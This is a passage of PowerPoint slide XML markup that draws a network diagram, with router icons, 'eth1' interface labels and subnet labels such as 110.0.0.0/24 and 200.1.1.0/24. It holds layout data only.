                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD909FE1-F2AE-9CE6-AEEA-CBEF6EB7BE9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6598589" y="1968796"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8113B15-7247-33E5-A039-41974603B33C}"/>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47" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{208A2041-CBB6-27D9-39B9-34A5BF0E7DFD}"/>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
        <p:nvSpPr>
          <p:cNvPr id="49" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDC03C1E-0580-29A8-B578-B6A5746C87A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7373670" y="1644027"/>
            <a:ext cx="114646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110.0.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25ABC97F-3FE4-65B9-14E5-E46C6BF978BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4346573" y="5294208"/>
            <a:ext cx="1756921" cy="2332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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68CA491B-0346-7120-81DF-D94E1811B1FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5069517" y="5457813"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F9E60F8-A190-B1E2-E70F-F9738B559FA2}"/>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54" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1287FC5-FCB6-0982-C9AE-541EAF9C446C}"/>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
        <p:nvSpPr>
          <p:cNvPr id="57" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73711160-E6AA-25D3-CFB5-B59E62C0D42E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4135015" y="5183863"/>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B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0556DE50-5D77-EEB7-AB4F-3176185FF608}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3008088" y="4654593"/>
            <a:ext cx="114646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200.1.1.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{711EA6DB-3CBF-5B87-0433-BB7709083344}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3712201" y="4908509"/>
            <a:ext cx="442355" cy="397361"/>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61" name="Straight Connector 327">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14D9231D-F6F4-A5D7-B5A7-C8D1F4A59E88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5152303" y="2469897"/>
            <a:ext cx="49830" cy="28359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227">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D190F71-C53A-081A-3E69-3B2AE8E3F03C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4911658" y="2892462"/>
            <a:ext cx="441381" cy="243680"/>
            <a:chOff x="2859" y="339"/>
            <a:chExt cx="384" cy="212"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9216" name="Group 228">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7047D95E-04D5-1C46-7DC4-63EB51DEC970}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2859" y="339"/>
              <a:ext cx="384" cy="212"/>
              <a:chOff x="5178" y="2567"/>
              <a:chExt cx="960" cy="528"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9218" name="AutoShape 229">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B79CEF9-3880-6C42-A687-5BF0A48F955C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5178" y="2567"/>
                <a:ext cx="960" cy="528"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill rotWithShape="0">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:srgbClr val="0066CC"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="0" scaled="1"/>
              </a:gradFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="819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t-IT" altLang="it-IT"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="9219" name="Group 231">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A71599CB-92D7-A3DA-CD6B-FEBE895C4894}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="5372" y="2597"/>
                <a:ext cx="595" cy="204"/>
                <a:chOff x="3028" y="2194"/>
                <a:chExt cx="823" cy="291"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9221" name="Freeform 232">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{235BF602-1B11-0779-BE8B-7267F86BEDC5}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3458" y="2201"/>
                  <a:ext cx="393" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 393"/>
                    <a:gd name="T3" fmla="*/ 125 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 393"/>
                    <a:gd name="T5" fmla="*/ 42 h 125"/>
                    <a:gd name="T6" fmla="*/ 393 w 393"/>
                    <a:gd name="T7" fmla="*/ 70 h 125"/>
                    <a:gd name="T8" fmla="*/ 342 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 393"/>
                    <a:gd name="T15" fmla="*/ 97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5">
                      <a:moveTo>
                        <a:pt x="0" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="42"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="70"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="342" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0"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22" name="Freeform 234">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0690E39-D900-99F7-C2C3-071C5F4F0360}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3028" y="2348"/>
                  <a:ext cx="393" cy="132"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 28 h 132"/>
                    <a:gd name="T2" fmla="*/ 305 w 393"/>
                    <a:gd name="T3" fmla="*/ 0 h 132"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 83 h 132"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 55 h 132"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 132 h 132"/>
                    <a:gd name="T10" fmla="*/ 305 w 393"/>
                    <a:gd name="T11" fmla="*/ 132 h 132"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 104 h 132"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 28 h 1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32">
                      <a:moveTo>
                        <a:pt x="393" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="305" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="83"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="55"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393"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36" name="Freeform 236">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A08864F-2E9C-67CD-BBE1-55FC588FB397}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3050" y="2194"/>
                  <a:ext cx="392" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 392"/>
                    <a:gd name="T1" fmla="*/ 28 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 392"/>
                    <a:gd name="T3" fmla="*/ 0 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 392"/>
                    <a:gd name="T5" fmla="*/ 77 h 125"/>
                    <a:gd name="T6" fmla="*/ 392 w 392"/>
                    <a:gd name="T7" fmla="*/ 56 h 125"/>
                    <a:gd name="T8" fmla="*/ 341 w 392"/>
                    <a:gd name="T9" fmla="*/ 125 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 392"/>
                    <a:gd name="T11" fmla="*/ 125 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 392"/>
                    <a:gd name="T13" fmla="*/ 104 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 392"/>
                    <a:gd name="T15" fmla="*/ 28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2" h="125">
                      <a:moveTo>
                        <a:pt x="0" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="392" y="56"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="341" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0"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38" name="Freeform 238">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FC2E3B2-C919-1992-88EB-BE8D9BE9D0D0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3442" y="2361"/>
                  <a:ext cx="393" cy="124"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 124"/>
                    <a:gd name="T2" fmla="*/ 306 w 393"/>
                    <a:gd name="T3" fmla="*/ 124 h 124"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 41 h 124"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 69 h 124"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 124"/>
                    <a:gd name="T10" fmla="*/ 306 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 124"/>
                    <a:gd name="T12" fmla="*/ 197 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 124"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 97 h 1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4">
                      <a:moveTo>
                        <a:pt x="393" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="306" y="124"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="306" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="197" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393"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grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9217" name="WordArt 249">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B21C11E9-E79B-591F-C55B-D12D65941A79}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2885" y="428"/>
              <a:ext cx="346" cy="103"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textCanDown">
                <a:avLst>
                  <a:gd name="adj" fmla="val 33333"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="it-IT" sz="1400" kern="10" dirty="0">
                  <a:ln w="9525">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>r1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9251" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45F7ECF4-BBD1-81E9-1575-5C65E627733D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5002404" y="2547001"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9252" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A382590-684E-624B-C2FD-ED989287E51D}"/>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53" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6882B6F1-22B7-65F5-0428-709B8C1F437D}"/>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3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9254" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B68F19A7-E933-8206-417D-E1B9EFC95BB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4989256" y="3258486"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9255" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D044E468-E2EA-922A-D0CC-BC93D34ABB02}"/>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eth1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9256" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F3EE73C-F240-FF8F-8287-378AD6A84E29}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9257" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77C258BF-8F96-8E01-38A0-4699F8A441AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5008167" y="4928067"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9258" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2F46F21-7203-7619-8916-69B00E355343}"/>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59" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFC06793-D4E5-9152-F512-BAEDADD8A065}"/>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2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9260" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C6D90F5-A246-3176-238C-D5F2BC867212}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5013037" y="4230593"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9261" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7420A59-29A6-CCD7-1F92-338DBB419B3D}"/>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eth1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9262" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4DBDF6C-CC33-8E07-1312-E6882593F2C0}"/>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2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9263" name="Group 227">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D70EE485-BB58-F6C0-94EA-166F7193715F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4962850" y="4602893"/>
            <a:ext cx="441381" cy="243680"/>
            <a:chOff x="2859" y="339"/>
            <a:chExt cx="384" cy="212"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9264" name="Group 228">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B89DB35-7D3B-8ED2-B083-C5C0E6252C6B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2859" y="339"/>
              <a:ext cx="384" cy="212"/>
              <a:chOff x="5178" y="2567"/>
              <a:chExt cx="960" cy="528"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9266" name="AutoShape 229">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{907C7144-F0BB-BEBB-6ADB-B10BC16A33A6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5178" y="2567"/>
